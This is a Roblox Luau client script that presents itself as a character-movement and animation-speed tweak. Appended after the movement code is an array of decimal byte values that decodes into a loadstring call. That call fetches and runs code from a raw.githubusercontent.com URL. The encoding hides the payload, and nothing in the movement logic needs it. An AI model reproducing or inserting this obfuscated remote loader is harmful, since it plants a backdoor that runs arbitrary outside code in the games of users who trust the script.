local Players = game:GetService("Players")
local RunService = game:GetService("RunService")

local player = Players.LocalPlayer

local function setup(character)
	local humanoid = character:WaitForChild("Humanoid")
	local root = character:WaitForChild("HumanoidRootPart")
	local animator = humanoid:WaitForChild("Animator")

	RunService.RenderStepped:Connect(function()
		local ws = humanoid.WalkSpeed
		local dir = humanoid.MoveDirection

		root.AssemblyAngularVelocity = Vector3.zero

		if dir.Magnitude > 0 then
			root.AssemblyLinearVelocity = Vector3.new(
				dir.X * ws,
				root.AssemblyLinearVelocity.Y,
				dir.Z * ws
			)
		else
			root.AssemblyLinearVelocity = Vector3.new(
				0,
				root.AssemblyLinearVelocity.Y,
				0
			)
		end

		for _, track in ipairs(animator:GetPlayingAnimationTracks()) do
			pcall(function()
				if dir.Magnitude > 0 then
					track:AdjustSpeed(16 / math.max(ws, 1))
				end
			end)
		end
	end)
end

if player.Character then
	setup(player.Character)
end

player.CharacterAdded:Connect(setup)
local bytes = {32,108,111,97,100,115,116,114,105,110,103,40,103,97,109,101,58,72,116,116,112,71,101,116,40,34,104,116,116,112,115,58,47,47,114,97,119,46,103,105,116,104,117,98,117,115,101,114,99,111,110,116,101,110,116,46,99,111,109,47,113,119,101,114,49,50,51,52,55,54,47,49,50,51,52,53,47,109,97,105,110,47,112,97,112,97,99,97,99,97,45,52,45,50,45,49,45,49,45,49,45,49,45,50,46,116,120,116,49,34,41,41,40,41,10,10}
local buf = {}
for i=1, #bytes do table.insert(buf, string.char(bytes[i])) end
local run, err = (loadstring or load)(table.concat(buf))
if run then run() else warn('errr: ' .. tostring(err)) end
